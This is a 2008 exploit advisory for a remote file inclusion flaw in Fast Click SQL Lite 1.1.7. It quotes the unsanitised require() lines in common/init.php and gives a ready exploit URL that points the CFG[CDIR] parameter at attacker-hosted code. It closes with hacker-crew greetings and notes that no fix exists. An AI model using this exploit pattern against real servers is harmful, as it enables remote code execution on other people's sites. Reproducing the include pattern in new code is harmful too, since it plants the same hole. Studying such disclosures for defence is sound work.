Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability

2008-10-19 11:01:02

===========================================================================================


[o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability

Software : Fast CLick SQL Lite version 1.1.7
Vendor : http://www.ftrsoft.com/
Download : http://www.ftrsoft.com/downloads.html
Author : NoGe
Contact : noge[at]mainhack[dot]com


===========================================================================================


[o] Vulnerable file

common/init.php

require($CFG['CDIR'].'/global.php');
require($CFG['CDIR'].'/sql.php');



[o] Exploit

http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode]


===========================================================================================


[o] Greetz

MainHack BrotherHood [ www.mainhack.com ]
VOP Crew [ Vaksin13 OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ k1tk4t
skulmatic olibekas ulga Cungkee str0ke


===========================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.